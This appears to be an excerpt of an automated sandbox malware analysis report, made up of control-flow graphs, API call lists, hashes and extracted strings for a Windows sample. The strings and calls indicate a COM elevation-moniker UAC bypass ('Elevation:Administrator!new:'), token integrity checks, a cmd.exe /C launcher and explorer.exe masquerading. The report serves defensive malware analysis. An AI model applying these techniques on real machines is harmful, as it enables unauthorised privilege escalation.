API calls 4539->4540 4541 4080f4 4540->4541 4541->4532 4545 406bae 4542->4545 4546 406bd2 4545->4546 4547 40b485 DeviceIoControl 4546->4547 4548 402d86 4547->4548 4548->4530 4618 4082b6 AllocateAndInitializeSid 4619 404853 4618->4619 4620 40483b CheckTokenMembership 4618->4620 4621 40aa98 FreeSid 4619->4621 4620->4619 4620->4621 4674 406137 4675 40cda2 LoadLibraryA 4674->4675 4676 406146 4674->4676 4677 40cdca 4675->4677 4676->4674 4697 4059f8 4698 405a03 4697->4698 4701 40158c DeviceIoControl 4698->4701 4700 405a0b 4702 401253 4701->4702 4702->4700 4622 407ab9 4623 407a69 LocalAlloc GetTokenInformation 4622->4623 4627 401ea5 4622->4627 4624 401071 4623->4624 4625 40103c GetSidSubAuthorityCount GetSidSubAuthority 4623->4625 4629 401240 FindCloseChangeNotification 4624->4629 4630 403bc5 4624->4630 4625->4624 4626 409c8c OpenProcessToken 4625->4626 4626->4624 4628 407a51 GetTokenInformation 4626->4628 4628->4623 4629->4630 4631 40294f 4630->4631 4632 403bcf LocalFree 4630->4632 4632->4631 4678 407539 GetModuleHandleW GetProcessHeap HeapAlloc 4679 403c07 4678->4679 4656 40197b 4657 404ba6 4 API calls 4656->4657 4659 40198e 4657->4659 4658 404ba6 4 API calls 4658->4659 4659->4658 4660 401999 4659->4660 4633 40bcbd GetProcessHeap HeapFree 4559 40803e GetProcessHeap HeapAlloc 4549 40aa7f 4550 40c2f6 LocalAlloc 4549->4550 4551 40aa8e 4549->4551 4550->4551 4604 406eff 4605 40b146 LocalFree 4604->4605 4606 406f0e 4604->4606 4605->4606 4661 40d17f 4662 40d1eb CoGetObject 4661->4662 4663 40d183 4661->4663 4663->4662

                                                                                                                                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                                                  • GetWindowsDirectoryW.KERNEL32(?,00000104), ref: 00409574
                                                                                                                                                                                                                                                                                                                                                                  • NtAllocateVirtualMemory.NTDLL(000000FF,0046C2D0,00000000,00001000,00003000,00000004), ref: 004095E1
                                                                                                                                                                                                                                                                                                                                                                  • EnterCriticalSection.KERNEL32(DB51E8EC), ref: 00409610
                                                                                                                                                                                                                                                                                                                                                                  • RtlInitUnicodeString.NTDLL(00000180,00600000), ref: 00409626
                                                                                                                                                                                                                                                                                                                                                                  • RtlInitUnicodeString.NTDLL(00000178,00600000), ref: 0040963C
                                                                                                                                                                                                                                                                                                                                                                  • LeaveCriticalSection.KERNEL32(DB51E8EC), ref: 00409649
                                                                                                                                                                                                                                                                                                                                                                  • LdrEnumerateLoadedModules.NTDLL(00000000,004050A2,00404393), ref: 0040965A
                                                                                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                  • Source File: 0000000A.00000002.2415975279.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000A.00000002.2415934578.0000000000400000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.2416060532.0000000000410000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.2416084086.0000000000413000.00000004.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.2416148545.000000000046E000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_10_2_400000_93B.jbxd
                                                                                                                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                                                  • API ID: CriticalInitSectionStringUnicode$AllocateDirectoryEnterEnumerateLeaveLoadedMemoryModulesVirtualWindows
                                                                                                                                                                                                                                                                                                                                                                  • String ID: explorer.exe
                                                                                                                                                                                                                                                                                                                                                                  • API String ID: 3728205514-3187896405
                                                                                                                                                                                                                                                                                                                                                                  • Opcode ID: 971d90eb416ca67aafcaf3557b906dfb5bbb6d99924e81ee9f7e95ee9359d988
                                                                                                                                                                                                                                                                                                                                                                  • Instruction ID: d3c5517ac64ebe0f4a93bb8fcf9093c65cacff95b6910bca11f849b0b04bbd4d
                                                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 971d90eb416ca67aafcaf3557b906dfb5bbb6d99924e81ee9f7e95ee9359d988
                                                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 4F3195B5940208EBC704DF90DCC5FA97775AB48305F1081BAFA05672D1E7B8AE85CB5D
                                                                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                                                                                                                                  control_flow_graph 189 40aea4-40aec0 GetPEB call 40d1f6 192 401bd2-401bd9 call 40c13c 189->192 193 40aec6 call 404369 189->193 198 4044bc-4044c3 call 403aee 192->198 199 401bdf 192->199 197 40aecb 193->197 197->192 203 4044c9 198->203 204 40a95e-40a96a call 4043ad call 407d21 198->204 200 40bfa2-40bfa5 199->200 203->200 209 40a970-40a980 Sleep call 4023f2 204->209 210 402b44-402b46 ExitProcess 204->210 209->210
                                                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                  • Source File: 0000000A.00000002.2415975279.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000A.00000002.2415934578.0000000000400000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.2416060532.0000000000410000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.2416084086.0000000000413000.00000004.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.2416148545.000000000046E000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_10_2_400000_93B.jbxd
                                                                                                                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                                                  • API ID: Module$FileHandleInitializeLibraryLoadName
                                                                                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                                                                                  • API String ID: 1691763914-0
                                                                                                                                                                                                                                                                                                                                                                  • Opcode ID: 1d1e830cd534af54437783b51cc9c08bc841a27dcc6edcfaa80d65915427b13e
                                                                                                                                                                                                                                                                                                                                                                  • Instruction ID: b20ac1345fbffd2ee6b09d0fcfa97f88ae309217d757d61775f2d603f36cc11d
                                                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 1d1e830cd534af54437783b51cc9c08bc841a27dcc6edcfaa80d65915427b13e
                                                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 0BF0BE70608345D6C6047FB38E4672A76B8AF0030DF10407FFD02B62D2EA7E9A11559F
                                                                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                                                  • FindCloseChangeNotification.KERNELBASE(00000000), ref: 00401244
                                                                                                                                                                                                                                                                                                                                                                  • LocalFree.KERNEL32(00000000), ref: 00403BD3
                                                                                                                                                                                                                                                                                                                                                                  • GetTokenInformation.KERNELBASE(00000000,00000019(TokenIntegrityLevel),00000000,00000000,00000000), ref: 00407A5F
                                                                                                                                                                                                                                                                                                                                                                  • LocalAlloc.KERNEL32(00000000,00000000), ref: 00407A6B
                                                                                                                                                                                                                                                                                                                                                                  • GetTokenInformation.KERNELBASE(00000000,00000019(TokenIntegrityLevel),00000000,00000000,00000000), ref: 00407A86
                                                                                                                                                                                                                                                                                                                                                                  • OpenProcessToken.ADVAPI32(000000FF,00000008,00000000), ref: 00409C94
                                                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                  • Source File: 0000000A.00000002.2415975279.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000A.00000002.2415934578.0000000000400000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.2416060532.0000000000410000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.2416084086.0000000000413000.00000004.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.2416148545.000000000046E000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_10_2_400000_93B.jbxd
                                                                                                                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                                                  • API ID: Token$InformationLocal$AllocChangeCloseFindFreeNotificationOpenProcess
                                                                                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                                                                                  • API String ID: 2854556994-0
                                                                                                                                                                                                                                                                                                                                                                  • Opcode ID: 2fabac034638274b2c3e67be2bc06953f5cdff95292f6c9f39c7e9c359d166b0
                                                                                                                                                                                                                                                                                                                                                                  • Instruction ID: 2e4b4cc31351ce880421fb230fd6ac05725b6f10eb8191371f756e524e2f733f
                                                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 2fabac034638274b2c3e67be2bc06953f5cdff95292f6c9f39c7e9c359d166b0
                                                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: ED313CB4A04208FFDB14CFD4C948BAEBBF8AB48301F1081AAE511B72D4D774AB04DB65
                                                                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                                                  • GetModuleFileNameW.KERNEL32(00000000,?,00000105), ref: 00404380
                                                                                                                                                                                                                                                                                                                                                                  • CoInitialize.OLE32(00000000), ref: 00404388
                                                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 00409543: GetWindowsDirectoryW.KERNEL32(?,00000104), ref: 00409574
                                                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 00409543: NtAllocateVirtualMemory.NTDLL(000000FF,0046C2D0,00000000,00001000,00003000,00000004), ref: 004095E1
                                                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 00409543: EnterCriticalSection.KERNEL32(DB51E8EC), ref: 00409610
                                                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 00409543: RtlInitUnicodeString.NTDLL(00000180,00600000), ref: 00409626
                                                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 00409543: RtlInitUnicodeString.NTDLL(00000178,00600000), ref: 0040963C
                                                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 00409543: LeaveCriticalSection.KERNEL32(DB51E8EC), ref: 00409649
                                                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 00409543: LdrEnumerateLoadedModules.NTDLL(00000000,004050A2,00404393), ref: 0040965A
                                                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 00405C4C: FindCloseChangeNotification.KERNELBASE(00000000), ref: 00401244
                                                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 00405C4C: LocalFree.KERNEL32(00000000), ref: 00403BD3
                                                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 00405C4C: OpenProcessToken.ADVAPI32(000000FF,00000008,00000000), ref: 00409C94
                                                                                                                                                                                                                                                                                                                                                                  • ExitProcess.KERNEL32 ref: 0040A945
                                                                                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                  • Source File: 0000000A.00000002.2415975279.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.2415934578.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.2416060532.0000000000410000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.2416084086.0000000000413000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.2416148545.000000000046E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_10_2_400000_93B.jbxd
                                                                                                                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                                                  • API ID: CriticalInitProcessSectionStringUnicode$AllocateChangeCloseDirectoryEnterEnumerateExitFileFindFreeInitializeLeaveLoadedLocalMemoryModuleModulesNameNotificationOpenTokenVirtualWindows
                                                                                                                                                                                                                                                                                                                                                                  • String ID: %systemroot%\system32\cmd.exe$/C
                                                                                                                                                                                                                                                                                                                                                                  • API String ID: 41577365-3057154508
                                                                                                                                                                                                                                                                                                                                                                  • Opcode ID: c5e22f618a67b604fe27e09ba26f5c85a86b36c7864aea17beee92a495aee461
                                                                                                                                                                                                                                                                                                                                                                  • Instruction ID: 7b01f62542bec0b1d87828faea97dd6a3c55c304531570e4c9315d46f9a50642
                                                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: c5e22f618a67b604fe27e09ba26f5c85a86b36c7864aea17beee92a495aee461
                                                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 9411ABB290430866D710BB60EC47FDE73299B54705F0045BBB709B50C2ED7997D88EAE
                                                                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                                                  • FindCloseChangeNotification.KERNELBASE(00000000), ref: 00401244
                                                                                                                                                                                                                                                                                                                                                                  • LocalFree.KERNEL32(00000000), ref: 00403BD3
                                                                                                                                                                                                                                                                                                                                                                  • LocalAlloc.KERNEL32(00000000,00000000), ref: 00407A6B
                                                                                                                                                                                                                                                                                                                                                                  • GetTokenInformation.KERNELBASE(00000000,00000019(TokenIntegrityLevel),00000000,00000000,00000000), ref: 00407A86
                                                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                  • Source File: 0000000A.00000002.2415975279.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.2415934578.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.2416060532.0000000000410000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.2416084086.0000000000413000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.2416148545.000000000046E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_10_2_400000_93B.jbxd
                                                                                                                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                                                  • API ID: Local$AllocChangeCloseFindFreeInformationNotificationToken
                                                                                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                                                                                  • API String ID: 2094194634-0
                                                                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                                                                                                                                  control_flow_graph 114 409727-40973b 115 409741-409744 114->115 116 402106-402115 call 405c31 114->116 118 404b9d-404ba0 115->118 120 40d182-40d18d 116->120 121 40211b-40211e 116->121 122 40d193-40d1f1 call 408bfe call 40b160 call 40335c CoGetObject 120->122 123 40d18e call 40335c 120->123 121->118 123->122
                                                                                                                                                                                                                                                                                                                                                                  Strings
Memory Dump Source
• Source File: 0000000A.00000002.2415975279.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000A.00000002.2415934578.0000000000400000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.2416060532.0000000000410000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.2416084086.0000000000413000.00000004.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.2416148545.000000000046E000.00000002.00000001.01000000.00000009.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_400000_93B.jbxd
                                                                                                                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                                                                                                                  • String ID: $$Elevation:Administrator!new:
                                                                                                                                                                                                                                                                                                                                                                  • API String ID: 0-4251798642
                                                                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                                                                                                                                  control_flow_graph 131 40d17f-40d181 132 40d183-40d1ea call 40335c call 408bfe call 40b160 call 40335c 131->132 133 40d1eb-40d1f1 CoGetObject 131->133 132->133
                                                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                                                  • CoGetObject.OLE32(?,00000024,?,?), ref: 0040D1EB
                                                                                                                                                                                                                                                                                                                                                                  Strings
Memory Dump Source
• Source File: 0000000A.00000002.2415975279.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000A.00000002.2415934578.0000000000400000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.2416060532.0000000000410000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.2416084086.0000000000413000.00000004.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.2416148545.000000000046E000.00000002.00000001.01000000.00000009.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_400000_93B.jbxd
                                                                                                                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                                                  • API ID: Object
                                                                                                                                                                                                                                                                                                                                                                  • String ID: $$Elevation:Administrator!new:
                                                                                                                                                                                                                                                                                                                                                                  • API String ID: 2936123098-4251798642
                                                                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 00405C4C: FindCloseChangeNotification.KERNELBASE(00000000), ref: 00401244
                                                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 00405C4C: LocalFree.KERNEL32(00000000), ref: 00403BD3
                                                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 00405C4C: OpenProcessToken.ADVAPI32(000000FF,00000008,00000000), ref: 00409C94
                                                                                                                                                                                                                                                                                                                                                                  • ExitProcess.KERNEL32 ref: 0040A945
                                                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 00405312: RtlInitUnicodeString.NTDLL(?,00007FFD), ref: 00408342
                                                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 00405312: RtlExpandEnvironmentStrings_U.NTDLL(00000000,?,?,00000000), ref: 00408372
                                                                                                                                                                                                                                                                                                                                                                  Strings
Memory Dump Source
• Source File: 0000000A.00000002.2415975279.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000A.00000002.2415934578.0000000000400000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.2416060532.0000000000410000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.2416084086.0000000000413000.00000004.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.2416148545.000000000046E000.00000002.00000001.01000000.00000009.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_400000_93B.jbxd
                                                                                                                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                                                  • API ID: Process$ChangeCloseEnvironmentExitExpandFindFreeInitLocalNotificationOpenStringStrings_TokenUnicode
                                                                                                                                                                                                                                                                                                                                                                  • String ID: %systemroot%\system32\cmd.exe$/C
                                                                                                                                                                                                                                                                                                                                                                  • API String ID: 1629495445-3057154508
                                                                                                                                                                                                                                                                                                                                                                  • Opcode ID: 74dd183bfbc60cce3caee40a229eb83cba66efea863e32e52d49e009b086718c
                                                                                                                                                                                                                                                                                                                                                                  • Instruction ID: 6885a5c3f576ce6d6f9b2f3c688c14414178aeb406d1450dcc701d4c4953fbe4
                                                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 74dd183bfbc60cce3caee40a229eb83cba66efea863e32e52d49e009b086718c
                                                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 88F0A4F280030866CB10EB70DC46FDA33389B14305F0045BAB609B60C2EE7997C88AAD
                                                                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                                                                                                                                  control_flow_graph 213 4069bb-4069df call 404b1d * 2 218 40a530-40a534 213->218 219 402b51-402b55 218->219 220 40a536-40a547 LoadLibraryA 218->220 221 40a54d-40a54e 220->221 222 40beae-40beb9 call 404873 220->222 221->222 222->218
                                                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                                                  • LoadLibraryA.KERNELBASE(?,00F1B4B0,?,8B6DF01F,?), ref: 0040A53E
                                                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                  • Source File: 0000000A.00000002.2415975279.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000A.00000002.2415934578.0000000000400000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.2416060532.0000000000410000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.2416084086.0000000000413000.00000004.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.2416148545.000000000046E000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_10_2_400000_93B.jbxd
                                                                                                                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                                                  • API ID: LibraryLoad
                                                                                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                                                                                  • API String ID: 1029625771-0
                                                                                                                                                                                                                                                                                                                                                                  • Opcode ID: f586a6cd2cf2dbeeef7eea32102fec9f33a1a5ead16db59af31ba7ceb6fdb687
                                                                                                                                                                                                                                                                                                                                                                  • Instruction ID: df007bf62870af7b74df0dbbe881ec21055e906183b30cdd37e1bfed71aa1605
                                                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: f586a6cd2cf2dbeeef7eea32102fec9f33a1a5ead16db59af31ba7ceb6fdb687
                                                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 6FE0EC631002087AD7102995DC46FE7765DD7C83A9F508432F705E61D1D63DD95092AE
                                                                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                                                  • VirtualProtect.KERNELBASE(?,?,?,?,?,?,00000000,30DBCA36), ref: 0040139E
                                                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                  • Source File: 0000000A.00000002.2415975279.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000A.00000002.2415934578.0000000000400000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.2416060532.0000000000410000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.2416084086.0000000000413000.00000004.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.2416148545.000000000046E000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_10_2_400000_93B.jbxd
                                                                                                                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                                                  • API ID: ProtectVirtual
                                                                                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                                                                                  • API String ID: 544645111-0
                                                                                                                                                                                                                                                                                                                                                                  • Opcode ID: 23b8f15108349a094178a66cda89c25afec04ff88fbbd6386f4d34c7ae965c1b
                                                                                                                                                                                                                                                                                                                                                                  • Instruction ID: a34d84a8aa74edc03bf23277289f2878ef58b524965e171c6cbb9bf5a1c13c13
                                                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 23b8f15108349a094178a66cda89c25afec04ff88fbbd6386f4d34c7ae965c1b
                                                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 6EF01276C0020CFFCF01AFA5C995CADBF75FF08204B0484AEF90426162DB369A24EB04
                                                                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                                                                                                                                  control_flow_graph 239 40a554-40a55a 240 40a536-40a547 LoadLibraryA 239->240 241 40a55c-40a55e 239->241 242 40beae-40beb9 call 404873 240->242 243 40a54d-40a54e 240->243 241->242 242->240 247 402b51-402b55 242->247 243->242
                                                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                                                  • LoadLibraryA.KERNELBASE(?,00F1B4B0,?,8B6DF01F,?), ref: 0040A53E
                                                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                  • Source File: 0000000A.00000002.2415975279.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000A.00000002.2415934578.0000000000400000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.2416060532.0000000000410000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.2416084086.0000000000413000.00000004.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.2416148545.000000000046E000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_10_2_400000_93B.jbxd
                                                                                                                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                                                  • API ID: LibraryLoad
                                                                                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                                                                                  • API String ID: 1029625771-0
                                                                                                                                                                                                                                                                                                                                                                  • Opcode ID: e49d5435ce23adc9ba57d6308fbfbf1d6f88da9ad89fc2230d2c21acb333a382
                                                                                                                                                                                                                                                                                                                                                                  • Instruction ID: 523668955e0e2244aa789caa92f6427d01868abc63ade59164da16a1192ab317
                                                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: e49d5435ce23adc9ba57d6308fbfbf1d6f88da9ad89fc2230d2c21acb333a382
                                                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: A5E0D831004604ADCB11DE58EC8EBDA7298D705311F6498339906FD581CB3CDA85859F
                                                                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

Control-flow Graph

• Executed
• Not Executed
control_flow_graph 232 40135e-401365 233 40136b-4013a6 call 404873 call 404b1d VirtualProtect 232->233 234 401366 call 403d7b 232->234 234->233
APIs
• VirtualProtect.KERNELBASE(?,?,?,?,?,?,00000000,30DBCA36), ref: 0040139E
Memory Dump Source
